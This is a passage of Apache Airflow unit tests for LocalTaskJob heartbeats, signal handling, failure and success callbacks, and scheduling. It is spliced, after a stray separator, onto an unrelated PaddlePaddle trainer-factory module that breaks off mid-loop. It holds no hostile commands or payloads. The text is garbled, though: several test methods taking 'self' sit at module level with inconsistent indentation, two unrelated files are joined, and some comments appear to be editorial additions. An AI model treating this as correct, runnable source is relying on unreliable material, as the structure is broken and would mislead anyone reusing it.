check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
assert all(check_result_2)
    def test_localtaskjob_heartbeat(self, dag_maker):
        """heartbeat_callback must raise when the TI's recorded hostname or the
        task-runner PID disagrees with the running job, and pass otherwise."""
        session = settings.Session()
        with dag_maker('test_localtaskjob_heartbeat'):
            op1 = DummyOperator(task_id='op1')

        dr = dag_maker.create_dagrun()
        ti = dr.get_task_instance(task_id=op1.task_id, session=session)
        ti.state = State.RUNNING
        ti.hostname = "blablabla"  # deliberately wrong hostname
        session.commit()

        job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
        ti.task = op1
        ti.refresh_from_task(op1)
        job1.task_runner = StandardTaskRunner(job1)
        job1.task_runner.process = mock.Mock()
        # Hostname mismatch -> heartbeat must fail.
        with pytest.raises(AirflowException):
            job1.heartbeat_callback()

        job1.task_runner.process.pid = 1
        ti.state = State.RUNNING
        ti.hostname = get_hostname()
        ti.pid = 1
        session.merge(ti)
        session.commit()
        # Hostname and PID now consistent (and distinct from this test
        # process) -> no exception expected.
        assert ti.pid != os.getpid()
        job1.heartbeat_callback(session=None)

        # Runner PID drifts from the recorded TI pid -> must fail again.
        job1.task_runner.process.pid = 2
        with pytest.raises(AirflowException):
            job1.heartbeat_callback()
    @mock.patch('airflow.jobs.local_task_job.psutil')
    def test_localtaskjob_heartbeat_with_run_as_user(self, psutil_mock, dag_maker):
        """With run_as_user set, the heartbeat compares the runner PID against
        the *parent* of the TI's recorded PID (the sudo wrapper's child)."""
        session = settings.Session()
        with dag_maker('test_localtaskjob_heartbeat'):
            op1 = DummyOperator(task_id='op1', run_as_user='myuser')

        dr = dag_maker.create_dagrun()
        ti = dr.get_task_instance(task_id=op1.task_id, session=session)
        ti.state = State.RUNNING
        ti.pid = 2
        ti.hostname = get_hostname()
        session.commit()

        job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
        ti.task = op1
        ti.refresh_from_task(op1)
        job1.task_runner = StandardTaskRunner(job1)
        job1.task_runner.process = mock.Mock()
        job1.task_runner.process.pid = 2
        # Here, ti.pid is 2, the parent process of ti.pid is a mock(different).
        # And task_runner process is 2. Should fail
        with pytest.raises(AirflowException, match='PID of job runner does not match'):
            job1.heartbeat_callback()

        job1.task_runner.process.pid = 1
        # We make the parent process of ti.pid to equal the task_runner process id
        psutil_mock.Process.return_value.ppid.return_value = 1
        ti.state = State.RUNNING
        ti.pid = 2
        # The task_runner process id is 1, same as the parent process of ti.pid
        # as seen above
        assert ti.run_as_user
        session.merge(ti)
        session.commit()
        job1.heartbeat_callback(session=None)

        # Here the task_runner process id is changed to 2
        # while parent process of ti.pid is kept at 1, which is different
        job1.task_runner.process.pid = 2
        with pytest.raises(AirflowException, match='PID of job runner does not match'):
            job1.heartbeat_callback()
@conf_vars({('core', 'default_impersonation'): 'testuser'})
@mock.patch('airflow.jobs.local_task_job.psutil')
def test_localtaskjob_heartbeat_with_default_impersonation(self, psutil_mock, dag_maker):
    """Same PID-vs-parent heartbeat check as the run_as_user test above, but
    impersonation comes from the `core.default_impersonation` config rather
    than the operator's run_as_user argument."""
    session = settings.Session()
    with dag_maker('test_localtaskjob_heartbeat'):
        op1 = DummyOperator(task_id='op1')
    dr = dag_maker.create_dagrun()
    ti = dr.get_task_instance(task_id=op1.task_id, session=session)
    ti.state = State.RUNNING
    ti.pid = 2
    ti.hostname = get_hostname()
    session.commit()
    job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
    ti.task = op1
    ti.refresh_from_task(op1)
    job1.task_runner = StandardTaskRunner(job1)
    job1.task_runner.process = mock.Mock()
    job1.task_runner.process.pid = 2
    # Here, ti.pid is 2, the parent process of ti.pid is a mock(different).
    # And task_runner process is 2. Should fail
    with pytest.raises(AirflowException, match='PID of job runner does not match'):
        job1.heartbeat_callback()
    job1.task_runner.process.pid = 1
    # We make the parent process of ti.pid to equal the task_runner process id
    psutil_mock.Process.return_value.ppid.return_value = 1
    ti.state = State.RUNNING
    ti.pid = 2
    # The task_runner process id is 1, same as the parent process of ti.pid
    # as seen above
    assert job1.task_runner.run_as_user == 'testuser'
    session.merge(ti)
    session.commit()
    job1.heartbeat_callback(session=None)
    # Here the task_runner process id is changed to 2
    # while parent process of ti.pid is kept at 1, which is different
    job1.task_runner.process.pid = 2
    with pytest.raises(AirflowException, match='PID of job runner does not match'):
        job1.heartbeat_callback()
def test_heartbeat_failed_fast(self):
    """
    Test that task heartbeat will sleep when it fails fast
    """
    # restore real sleeping for this test so heartbeat spacing is measurable
    self.mock_base_job_sleep.side_effect = time.sleep
    dag_id = 'test_heartbeat_failed_fast'
    task_id = 'test_heartbeat_failed_fast_op'
    with create_session() as session:
        # NOTE(review): dag_id/task_id are re-assigned identically here --
        # redundant with the assignments just above.
        dag_id = 'test_heartbeat_failed_fast'
        task_id = 'test_heartbeat_failed_fast_op'
        dag = self.dagbag.get_dag(dag_id)
        task = dag.get_task(task_id)
        dag.create_dagrun(
            run_id="test_heartbeat_failed_fast_run",
            state=State.RUNNING,
            execution_date=DEFAULT_DATE,
            start_date=DEFAULT_DATE,
            session=session,
        )
        ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
        ti.refresh_from_db()
        ti.state = State.RUNNING
        ti.hostname = get_hostname()
        ti.pid = 1
        session.commit()
        job = LocalTaskJob(task_instance=ti, executor=MockExecutor(do_update=False))
        job.heartrate = 2
        heartbeat_records = []
        # record every heartbeat timestamp so the spacing can be checked below
        job.heartbeat_callback = lambda session: heartbeat_records.append(job.latest_heartbeat)
        job._execute()
        assert len(heartbeat_records) > 2
        for i in range(1, len(heartbeat_records)):
            time1 = heartbeat_records[i - 1]
            time2 = heartbeat_records[i]
            # Assert that difference small enough
            delta = (time2 - time1).total_seconds()
            assert abs(delta - job.heartrate) < 0.5
@pytest.mark.quarantined
def test_mark_success_no_kill(self):
    """
    Test that ensures that mark_success in the UI doesn't cause
    the task to fail, and that the task exits
    """
    dag = self.dagbag.dags.get('test_mark_success')
    task = dag.get_task('task1')
    session = settings.Session()
    dag.clear()
    dag.create_dagrun(
        run_id="test",
        state=State.RUNNING,
        execution_date=DEFAULT_DATE,
        start_date=DEFAULT_DATE,
        session=session,
    )
    ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
    ti.refresh_from_db()
    job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
    # drop pooled DB connections before forking so the child gets fresh ones
    settings.engine.dispose()
    process = multiprocessing.Process(target=job1.run)
    process.start()
    # poll (up to ~5s) until the task is actually running
    for _ in range(0, 50):
        if ti.state == State.RUNNING:
            break
        time.sleep(0.1)
        ti.refresh_from_db()
    assert State.RUNNING == ti.state
    # simulate "mark success" from the UI
    ti.state = State.SUCCESS
    session.merge(ti)
    session.commit()
    process.join(timeout=10)
    ti.refresh_from_db()
    assert State.SUCCESS == ti.state
def test_localtaskjob_double_trigger(self):
    """A second LocalTaskJob for a TI already RUNNING elsewhere must not
    start a task runner, and must leave the original TI untouched."""
    dag = self.dagbag.dags.get('test_localtaskjob_double_trigger')
    task = dag.get_task('test_localtaskjob_double_trigger_task')
    session = settings.Session()
    dag.clear()
    dr = dag.create_dagrun(
        run_id="test",
        state=State.SUCCESS,
        execution_date=DEFAULT_DATE,
        start_date=DEFAULT_DATE,
        session=session,
    )
    # mark the TI as if another host/process is already running it
    ti = dr.get_task_instance(task_id=task.task_id, session=session)
    ti.state = State.RUNNING
    ti.hostname = get_hostname()
    ti.pid = 1
    session.merge(ti)
    session.commit()
    ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
    ti_run.refresh_from_db()
    job1 = LocalTaskJob(task_instance=ti_run, executor=SequentialExecutor())
    with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_method:
        job1.run()
        mock_method.assert_not_called()
    # the original TI must be unchanged
    ti = dr.get_task_instance(task_id=task.task_id, session=session)
    assert ti.pid == 1
    assert ti.state == State.RUNNING
    session.close()
@pytest.mark.quarantined
def test_localtaskjob_maintain_heart_rate(self):
    """The job loop should heartbeat exactly once before the runner reports
    a return code, and finish without extra sleeping."""
    dag = self.dagbag.dags.get('test_localtaskjob_double_trigger')
    task = dag.get_task('test_localtaskjob_double_trigger_task')
    session = settings.Session()
    dag.clear()
    dag.create_dagrun(
        run_id="test",
        state=State.SUCCESS,
        execution_date=DEFAULT_DATE,
        start_date=DEFAULT_DATE,
        session=session,
    )
    ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
    ti_run.refresh_from_db()
    job1 = LocalTaskJob(task_instance=ti_run, executor=SequentialExecutor())
    # this should make sure we only heartbeat once and exit at the second
    # loop in _execute()
    return_codes = [None, 0]

    def multi_return_code():
        return return_codes.pop(0)

    time_start = time.time()
    with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_start:
        with patch.object(StandardTaskRunner, 'return_code') as mock_ret_code:
            mock_ret_code.side_effect = multi_return_code
            job1.run()
            assert mock_start.call_count == 1
            assert mock_ret_code.call_count == 2
    time_end = time.time()
    assert self.mock_base_job_sleep.call_count == 1
    assert job1.state == State.SUCCESS
    # Consider we have patched sleep call, it should not be sleeping to
    # keep up with the heart rate in other unpatched places
    #
    # We already make sure patched sleep call is only called once
    assert time_end - time_start < job1.heartrate
    session.close()
def test_mark_failure_on_failure_callback(self, dag_maker):
    """
    Test that ensures that mark_failure in the UI fails
    the task, and executes on_failure_callback
    """
    # use shared memory value so we can properly track value change even if
    # it's been updated across processes.
    failure_callback_called = Value('i', 0)
    task_terminated_externally = Value('i', 1)

    def check_failure(context):
        with failure_callback_called.get_lock():
            failure_callback_called.value += 1
        assert context['dag_run'].dag_id == 'test_mark_failure'
        assert context['exception'] == "task marked as failed externally"

    def task_function(ti):
        # flip our own state to FAILED, simulating the UI "mark failed"
        with create_session() as session:
            assert State.RUNNING == ti.state
            ti.log.info("Marking TI as failed 'externally'")
            ti.state = State.FAILED
            session.merge(ti)
            session.commit()
        time.sleep(10)
        # This should not happen -- the state change should be noticed and the task should get killed
        with task_terminated_externally.get_lock():
            task_terminated_externally.value = 0

    with dag_maker("test_mark_failure", start_date=DEFAULT_DATE):
        task = PythonOperator(
            task_id='test_state_succeeded1',
            python_callable=task_function,
            on_failure_callback=check_failure,
        )
    dag_maker.create_dagrun()
    ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
    ti.refresh_from_db()
    job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
    with timeout(30):
        # This should be _much_ shorter to run.
        # If you change this limit, make the timeout in the callable above bigger
        job1.run()
    ti.refresh_from_db()
    assert ti.state == State.FAILED
    assert failure_callback_called.value == 1
    assert task_terminated_externally.value == 1
@patch('airflow.utils.process_utils.subprocess.check_call')
@patch.object(StandardTaskRunner, 'return_code')
def test_failure_callback_only_called_once(self, mock_return_code, _check_call, dag_maker):
    """
    Test that ensures that when a task exits with failure by itself,
    failure callback is only called once
    """
    # use shared memory value so we can properly track value change even if
    # it's been updated across processes.
    failure_callback_called = Value('i', 0)
    callback_count_lock = Lock()

    def failure_callback(context):
        with callback_count_lock:
            failure_callback_called.value += 1
        assert context['dag_run'].dag_id == 'test_failure_callback_race'
        assert isinstance(context['exception'], AirflowFailException)

    def task_function(ti):
        raise AirflowFailException()

    with dag_maker("test_failure_callback_race"):
        task = PythonOperator(
            task_id='test_exit_on_failure',
            python_callable=task_function,
            on_failure_callback=failure_callback,
        )
    dag_maker.create_dagrun()
    ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
    ti.refresh_from_db()
    job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())

    # Simulate race condition where job1 heartbeat ran right after task
    # state got set to failed by ti.handle_failure but before task process
    # fully exits. See _execute loop in airflow/jobs/local_task_job.py.
    # In this case, we have:
    # * task_runner.return_code() is None
    # * ti.state == State.Failed
    #
    # We also need to set return_code to a valid int after job1.terminating
    # is set to True so _execute loop won't loop forever.
    def dummy_return_code(*args, **kwargs):
        return None if not job1.terminating else -9

    mock_return_code.side_effect = dummy_return_code
    with timeout(10):
        # This should be _much_ shorter to run.
        # If you change this limit, make the timeout in the callable above bigger
        job1.run()
    ti.refresh_from_db()
    assert ti.state == State.FAILED  # task exits with failure state
    assert failure_callback_called.value == 1
def test_mark_success_on_success_callback(self, dag_maker):
    """
    Test that ensures that where a task is marked success in the UI
    on_success_callback gets executed
    """
    # use shared memory value so we can properly track value change even if
    # it's been updated across processes.
    success_callback_called = Value('i', 0)
    task_terminated_externally = Value('i', 1)
    shared_mem_lock = Lock()

    def success_callback(context):
        with shared_mem_lock:
            success_callback_called.value += 1
        assert context['dag_run'].dag_id == 'test_mark_success'

    def task_function(ti):
        time.sleep(60)
        # This should not happen -- the state change should be noticed and the task should get killed
        with shared_mem_lock:
            task_terminated_externally.value = 0

    with dag_maker(dag_id='test_mark_success', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}):
        task = PythonOperator(
            task_id='test_state_succeeded1',
            python_callable=task_function,
            on_success_callback=success_callback,
        )
    session = settings.Session()
    ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
    ti.refresh_from_db()
    job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
    job1.task_runner = StandardTaskRunner(job1)
    # drop pooled DB connections before forking the job process
    settings.engine.dispose()
    process = multiprocessing.Process(target=job1.run)
    process.start()
    # poll (up to ~5s) until the task is actually running
    for _ in range(0, 25):
        ti.refresh_from_db()
        if ti.state == State.RUNNING:
            break
        time.sleep(0.2)
    assert ti.state == State.RUNNING
    # simulate "mark success" from the UI
    ti.state = State.SUCCESS
    session.merge(ti)
    session.commit()
    ti.refresh_from_db()
    process.join(timeout=10)
    assert success_callback_called.value == 1
    assert task_terminated_externally.value == 1
def test_task_sigkill_calls_on_failure_callback(self, dag_maker):
    """
    Test that ensures that when a task is killed with sigkill
    on_failure_callback gets executed
    """
    # use shared memory value so we can properly track value change even if
    # it's been updated across processes.
    failure_callback_called = Value('i', 0)
    task_terminated_externally = Value('i', 1)
    shared_mem_lock = Lock()

    def failure_callback(context):
        with shared_mem_lock:
            failure_callback_called.value += 1
        assert context['dag_run'].dag_id == 'test_send_sigkill'

    def task_function(ti):
        # the task SIGKILLs its own process
        os.kill(os.getpid(), signal.SIGKILL)
        # This should not happen -- the state change should be noticed and the task should get killed
        with shared_mem_lock:
            task_terminated_externally.value = 0

    with dag_maker(dag_id='test_send_sigkill'):
        task = PythonOperator(
            task_id='test_on_failure',
            python_callable=task_function,
            on_failure_callback=failure_callback,
        )
    ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
    ti.refresh_from_db()
    job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
    settings.engine.dispose()
    process = multiprocessing.Process(target=job1.run)
    process.start()
    time.sleep(0.3)
    process.join(timeout=10)
    assert failure_callback_called.value == 1
    assert task_terminated_externally.value == 1
def test_process_sigterm_calls_on_failure_callback(self, dag_maker):
    """
    Test that ensures that when a task runner is killed with sigterm
    on_failure_callback gets executed
    """
    # use shared memory value so we can properly track value change even if
    # it's been updated across processes.
    failure_callback_called = Value('i', 0)
    task_terminated_externally = Value('i', 1)
    shared_mem_lock = Lock()

    def failure_callback(context):
        with shared_mem_lock:
            failure_callback_called.value += 1
        assert context['dag_run'].dag_id == 'test_mark_failure'

    def task_function(ti):
        time.sleep(60)
        # This should not happen -- the state change should be noticed and the task should get killed
        with shared_mem_lock:
            task_terminated_externally.value = 0

    with dag_maker(dag_id='test_mark_failure', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}):
        task = PythonOperator(
            task_id='test_on_failure',
            python_callable=task_function,
            on_failure_callback=failure_callback,
        )
    ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
    ti.refresh_from_db()
    job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
    settings.engine.dispose()
    process = multiprocessing.Process(target=job1.run)
    process.start()
    # wait (up to ~5s) for the task to be running, then SIGTERM the job
    for _ in range(0, 25):
        ti.refresh_from_db()
        if ti.state == State.RUNNING:
            break
        time.sleep(0.2)
    os.kill(process.pid, signal.SIGTERM)
    ti.refresh_from_db()
    process.join(timeout=10)
    assert failure_callback_called.value == 1
    assert task_terminated_externally.value == 1
@pytest.mark.parametrize(
    "conf, dependencies, init_state, first_run_state, second_run_state, error_message",
    [
        (
            {('scheduler', 'schedule_after_task_execution'): 'True'},
            {'A': 'B', 'B': 'C'},
            {'A': State.QUEUED, 'B': State.NONE, 'C': State.NONE},
            {'A': State.SUCCESS, 'B': State.SCHEDULED, 'C': State.NONE},
            {'A': State.SUCCESS, 'B': State.SUCCESS, 'C': State.SCHEDULED},
            "A -> B -> C, with fast-follow ON when A runs, B should be QUEUED. Same for B and C.",
        ),
        (
            {('scheduler', 'schedule_after_task_execution'): 'False'},
            {'A': 'B', 'B': 'C'},
            {'A': State.QUEUED, 'B': State.NONE, 'C': State.NONE},
            {'A': State.SUCCESS, 'B': State.NONE, 'C': State.NONE},
            None,
            "A -> B -> C, with fast-follow OFF, when A runs, B shouldn't be QUEUED.",
        ),
        (
            {('scheduler', 'schedule_after_task_execution'): 'True'},
            {'A': 'B', 'C': 'B', 'D': 'C'},
            {'A': State.QUEUED, 'B': State.NONE, 'C': State.NONE, 'D': State.NONE},
            {'A': State.SUCCESS, 'B': State.NONE, 'C': State.NONE, 'D': State.NONE},
            None,
            "D -> C -> B & A -> B, when A runs but C isn't QUEUED yet, B shouldn't be QUEUED.",
        ),
        (
            {('scheduler', 'schedule_after_task_execution'): 'True'},
            {'A': 'C', 'B': 'C'},
            {'A': State.QUEUED, 'B': State.FAILED, 'C': State.NONE},
            {'A': State.SUCCESS, 'B': State.FAILED, 'C': State.UPSTREAM_FAILED},
            None,
            "A -> C & B -> C, when A is QUEUED but B has FAILED, C is marked UPSTREAM_FAILED.",
        ),
    ],
)
def test_fast_follow(
    self, conf, dependencies, init_state, first_run_state, second_run_state, error_message, dag_maker
):
    """Verify the 'fast-follow' mini-scheduler run after task execution:
    downstream TIs reach `first_run_state` after task A runs and, when
    given, `second_run_state` after task B runs."""
    with conf_vars(conf):
        session = settings.Session()
        python_callable = lambda: True
        with dag_maker('test_dagrun_fast_follow') as dag:
            task_a = PythonOperator(task_id='A', python_callable=python_callable)
            task_b = PythonOperator(task_id='B', python_callable=python_callable)
            task_c = PythonOperator(task_id='C', python_callable=python_callable)
            if 'D' in init_state:
                task_d = PythonOperator(task_id='D', python_callable=python_callable)
            for upstream, downstream in dependencies.items():
                dag.set_dependency(upstream, downstream)
        scheduler_job = SchedulerJob(subdir=os.devnull)
        scheduler_job.dagbag.bag_dag(dag, root_dag=dag)
        dag_run = dag.create_dagrun(run_id='test_dagrun_fast_follow', state=State.RUNNING)
        # seed each TI with its parametrized initial state
        task_instance_a = TaskInstance(task_a, dag_run.execution_date, init_state['A'])
        task_instance_b = TaskInstance(task_b, dag_run.execution_date, init_state['B'])
        task_instance_c = TaskInstance(task_c, dag_run.execution_date, init_state['C'])
        if 'D' in init_state:
            task_instance_d = TaskInstance(task_d, dag_run.execution_date, init_state['D'])
            session.merge(task_instance_d)
        session.merge(task_instance_a)
        session.merge(task_instance_b)
        session.merge(task_instance_c)
        session.flush()
        job1 = LocalTaskJob(
            task_instance=task_instance_a, ignore_ti_state=True, executor=SequentialExecutor()
        )
        job1.task_runner = StandardTaskRunner(job1)
        job2 = LocalTaskJob(
            task_instance=task_instance_b, ignore_ti_state=True, executor=SequentialExecutor()
        )
        job2.task_runner = StandardTaskRunner(job2)
        settings.engine.dispose()
        job1.run()
        self.validate_ti_states(dag_run, first_run_state, error_message)
        if second_run_state:
            job2.run()
            self.validate_ti_states(dag_run, second_run_state, error_message)
        if scheduler_job.processor_agent:
            scheduler_job.processor_agent.end()
@pytest.mark.quarantined
def test_task_sigkill_works_with_retries(self, dag_maker):
    """
    Test that ensures that tasks are retried when they receive sigkill
    """
    # use shared memory value so we can properly track value change even if
    # it's been updated across processes.
    retry_callback_called = Value('i', 0)
    task_terminated_externally = Value('i', 1)
    shared_mem_lock = Lock()

    def retry_callback(context):
        with shared_mem_lock:
            retry_callback_called.value += 1
        assert context['dag_run'].dag_id == 'test_mark_failure_2'

    def task_function(ti):
        # the task SIGKILLs its own process
        os.kill(os.getpid(), signal.SIGKILL)
        # This should not happen -- the state change should be noticed and the task should get killed
        with shared_mem_lock:
            task_terminated_externally.value = 0

    with dag_maker(
        dag_id='test_mark_failure_2', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}
    ):
        task = PythonOperator(
            task_id='test_on_failure',
            python_callable=task_function,
            retries=1,
            retry_delay=timedelta(seconds=2),
            on_retry_callback=retry_callback,
        )
    ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
    ti.refresh_from_db()
    job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
    job1.task_runner = StandardTaskRunner(job1)
    job1.task_runner.start()
    settings.engine.dispose()
    process = multiprocessing.Process(target=job1.run)
    process.start()
    time.sleep(0.4)
    process.join(timeout=10)
    ti.refresh_from_db()
    # a SIGKILLed task with retries left must go to UP_FOR_RETRY
    assert ti.state == State.UP_FOR_RETRY
    assert retry_callback_called.value == 1
    assert task_terminated_externally.value == 1
@pytest.mark.quarantined
def test_process_sigterm_works_with_retries(self, dag_maker):
    """
    Test that ensures that task runner sets tasks to retry when they(task runner)
    receive sigterm
    """
    # use shared memory value so we can properly track value change even if
    # it's been updated across processes.
    retry_callback_called = Value('i', 0)
    task_terminated_externally = Value('i', 1)
    shared_mem_lock = Lock()

    def retry_callback(context):
        with shared_mem_lock:
            retry_callback_called.value += 1
        assert context['dag_run'].dag_id == 'test_mark_failure_2'

    def task_function(ti):
        time.sleep(60)
        # This should not happen -- the state change should be noticed and the task should get killed
        with shared_mem_lock:
            task_terminated_externally.value = 0

    with dag_maker(dag_id='test_mark_failure_2'):
        task = PythonOperator(
            task_id='test_on_failure',
            python_callable=task_function,
            retries=1,
            retry_delay=timedelta(seconds=2),
            on_retry_callback=retry_callback,
        )
    ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
    ti.refresh_from_db()
    job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
    job1.task_runner = StandardTaskRunner(job1)
    job1.task_runner.start()
    settings.engine.dispose()
    process = multiprocessing.Process(target=job1.run)
    process.start()
    # wait until the task is running and has a recorded PID, then SIGTERM it
    for _ in range(0, 25):
        ti.refresh_from_db()
        if ti.state == State.RUNNING and ti.pid is not None:
            break
        time.sleep(0.2)
    os.kill(process.pid, signal.SIGTERM)
    process.join(timeout=10)
    ti.refresh_from_db()
    assert ti.state == State.UP_FOR_RETRY
    assert retry_callback_called.value == 1
    assert task_terminated_externally.value == 1
def test_task_exit_should_update_state_of_finished_dagruns_with_dag_paused(self, dag_maker):
    """Test that with DAG paused, DagRun state will update when the tasks finishes the run"""
    with dag_maker(dag_id='test_dags') as dag:
        op1 = PythonOperator(task_id='dummy', python_callable=lambda: True)
    session = settings.Session()
    dagmodel = dag_maker.dag_model
    dagmodel.next_dagrun_create_after = dag.following_schedule(DEFAULT_DATE)
    # pause the DAG -- the mini scheduler must still finalize its dagruns
    dagmodel.is_paused = True
    session.merge(dagmodel)
    session.flush()
    # Write Dag to DB
    dagbag = DagBag(dag_folder="/dev/null", include_examples=False, read_dags_from_db=False)
    dagbag.bag_dag(dag, root_dag=dag)
    dagbag.sync_to_db()
    dr = dag_maker.create_dagrun(run_type=DagRunType.SCHEDULED)
    assert dr.state == State.RUNNING
    ti = TaskInstance(op1, dr.execution_date)
    job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
    job1.task_runner = StandardTaskRunner(job1)
    job1.run()
    session.add(dr)
    session.refresh(dr)
    assert dr.state == State.SUCCESS
@pytest.fixture()
def clean_db_helper():
    """Yield-style fixture: wipe job and dag-run tables after each test."""
    yield
    db.clear_db_jobs()
    db.clear_db_runs()
@pytest.mark.usefixtures("clean_db_helper")
class TestLocalTaskJobPerformance:
    """Query-count regression tests for LocalTaskJob's main loop."""

    @pytest.mark.parametrize("return_codes", [[0], 9 * [None] + [0]])  # type: ignore
    @mock.patch("airflow.jobs.local_task_job.get_task_runner")
    def test_number_of_queries_single_loop(self, mock_get_task_runner, return_codes, dag_maker):
        """The heartbeat loop must not issue extra DB queries per iteration:
        whether the runner finishes immediately ([0]) or after nine idle
        polls (9*[None] + [0]), the total query count stays at 18."""
        unique_prefix = str(uuid.uuid4())
        with dag_maker(dag_id=f'{unique_prefix}_test_number_of_queries'):
            task = DummyOperator(task_id='test_state_succeeded1')
        dag_maker.create_dagrun(run_id=unique_prefix, state=State.NONE)
        ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
        # BUG FIX: the original assigned `.side_effects` (trailing "s"), which
        # just creates an inert attribute on the Mock and never feeds the
        # return codes; `side_effect` is the attribute mock consumes.
        mock_get_task_runner.return_value.return_code.side_effect = return_codes
        job = LocalTaskJob(task_instance=ti, executor=MockExecutor())
        with assert_queries_count(18):
            job.run()
|
trainer_factory.py | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of TrainerFactory."""
import threading
import time
import logging
import numpy as np
logging.basicConfig()
from .trainer_desc import MultiTrainer, DistMultiTrainer, PipelineTrainer
from .device_worker import Hogwild, DownpourSGD, Section
from .framework import Variable
from multiprocessing import Process, Manager
__all__ = ["TrainerFactory", "FetchHandler", "FetchHandlerMonitor"]
class TrainerFactory(object):
    """
    Create trainer and device worker.
    If opt_info is not None, it will get configs from opt_info,
    otherwise create MultiTrainer and Hogwild.
    """

    def __init__(self):
        pass

    def _create_trainer(self, opt_info=None):
        """Build and return a trainer configured with a device worker.

        Args:
            opt_info (dict|None): optimizer info. Must contain "trainer" and
                "device_worker" class names (resolved via ``globals()``);
                all remaining keys are optional and forwarded to the
                corresponding trainer setter when present and not None.

        Returns:
            The configured trainer instance.
        """
        trainer = None
        device_worker = None
        if opt_info is None:  # identity check, not `== None`
            # default is MultiTrainer + Hogwild
            trainer = MultiTrainer()
            device_worker = Hogwild()
            trainer._set_device_worker(device_worker)
        else:
            trainer_class = opt_info["trainer"]
            device_worker_class = opt_info["device_worker"]
            trainer = globals()[trainer_class]()
            device_worker = globals()[device_worker_class]()
            if "fleet_desc" in opt_info:
                device_worker._set_fleet_desc(opt_info["fleet_desc"])
                trainer._set_fleet_desc(opt_info["fleet_desc"])
            # Table-driven forwarding replaces 14 near-identical `if` blocks:
            # each optional key maps to its trainer setter; absent or
            # explicitly-None keys are skipped (same semantics as before).
            optional_setters = (
                ("use_cvm", trainer._set_use_cvm),
                ("no_cvm", trainer._set_no_cvm),
                ("scale_datanorm", trainer._set_scale_datanorm),
                ("dump_slot", trainer._set_dump_slot),
                ("mpi_rank", trainer._set_mpi_rank),
                ("mpi_size", trainer._set_mpi_size),
                ("dump_fields", trainer._set_dump_fields),
                ("dump_fields_path", trainer._set_dump_fields_path),
                ("dump_file_num", trainer._set_dump_file_num),
                ("dump_converter", trainer._set_dump_converter),
                ("adjust_ins_weight", trainer._set_adjust_ins_weight),
                ("copy_table", trainer._set_copy_table_config),
                ("check_nan_var_names", trainer._set_check_nan_var_names),
                ("dump_param", trainer._set_dump_param),
            )
            for key, setter in optional_setters:
                if opt_info.get(key) is not None:
                    setter(opt_info[key])
            trainer._set_device_worker(device_worker)
        return trainer
class FetchHandlerMonitor(object):
    """Periodically fetch watched variables from *scope* and pass them to a
    user handler.

    A daemon worker thread wakes once per second; every
    ``handler.period_secs`` seconds it resolves each variable in
    ``handler.var_dict`` to a numpy array (or None when unavailable) and
    calls ``handler.handler(res_dict)``.
    """

    def __init__(self, scope, handler):
        # handler must expose .period_secs, .var_dict and .handler(res_dict)
        self.fetch_instance = handler
        self.fetch_thread = threading.Thread(
            target=self.handler_launch_func, args=(scope, self.fetch_instance))
        # guards self.running across the worker thread and start()/stop()
        self.running_lock = threading.Lock()
        self.running = False

    def handler_launch_func(self, scope, handler):
        """Worker-thread loop; exits once stop() clears self.running."""
        fetch_instance = handler
        period_secs = fetch_instance.period_secs
        # map variable name in scope -> user-facing key in var_dict
        var_name_to_key = {}
        for key in fetch_instance.var_dict:
            if isinstance(fetch_instance.var_dict[key], Variable):
                var_name_to_key[fetch_instance.var_dict[key].name] = key
            else:
                logging.warning("the value of {} is not a Variable".format(key))
                var_name_to_key["None.var"] = key
        elapsed_secs = 0
        while True:
            # BUG FIX: the original acquired the lock and `break`-ed without
            # releasing it, leaving running_lock held forever; the `with`
            # block releases it on every exit path.
            with self.running_lock:
                if not self.running:
                    break
                if elapsed_secs < period_secs:
                    # TODO(guru4elephant): needs customized condition
                    time.sleep(1)
                    elapsed_secs += 1
                else:
                    elapsed_secs = 0
                    fetch_dict = {}
                    for key in var_name_to_key:
                        var = scope.find_var(key)
                        fetch_dict[key] = var
                        if var is None:
                            logging.warning("{} value currently not available".
                                            format(var_name_to_key[key]))
                    res_dict = {}
                    for key in fetch_dict:
                        user_name = var_name_to_key[key]
                        if fetch_dict[key] is None:
                            res_dict[user_name] = None
                            continue
                        res_dict[user_name] = fetch_dict[key].get_tensor()
